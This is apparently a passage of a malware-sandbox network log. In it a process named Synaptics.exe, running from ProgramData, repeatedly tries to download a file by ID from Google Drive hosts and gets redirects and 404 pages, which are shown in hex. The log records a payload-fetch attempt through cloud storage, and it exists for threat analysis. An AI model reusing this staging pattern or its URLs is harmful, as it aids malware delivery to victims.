                                                                                                                                                                                    2024-12-30 10:51:53 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    50192.168.2.451951142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:53 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    51192.168.2.451954142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:53 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    52192.168.2.451953142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:53 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    53192.168.2.451955142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:53 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    54192.168.2.451962142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:54 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:54 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_m7CsKUdMBCBAkVj8DdpSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    55192.168.2.451963142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:54 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:54 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-lwGDuKdnL2lWoDpo4PM9kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    56192.168.2.451976142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:55 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:55 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC48Ntr54edbBmEJSFVocgyN2eWoziBJY7sPrSK4W0S2f5Uo64I-UfA4R3i1yROaGnLp
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:55 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-64kxkWckZSIGZVoTxpTa_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:55 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:51:55 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 67 4e 44 4f 2d 58 48 30 77 74 70 35 42 71 77 64 62 6b 30 39 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="igNDO-XH0wtp5Bqwdbk09A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:51:55 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    57192.168.2.451975142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:55 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:55 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-uVmIRofwwIXoJebd6OHfPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    58192.168.2.451978142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:55 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:55 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ezYagbpcd3yKnbkgONl2xQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    59192.168.2.451977142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:55 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:55 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5HEP_z-8v2WO3-6Kk1YlU0D-Vfe40H9KkSIJ4xY50cX8NtyuTcFOurU6gjz4ERhilz
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:55 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dSI5G8QlmZ8ns9xYQ26UNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:55 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:51:55 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 53 61 34 30 68 7a 43 64 70 52 5a 6c 66 63 2d 66 78 56 39 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="oSa40hzCdpRZlfc-fxV9MA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:51:55 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    60192.168.2.451985142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:56 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:56 UTC1314INHTTP/1.1 303 See Other
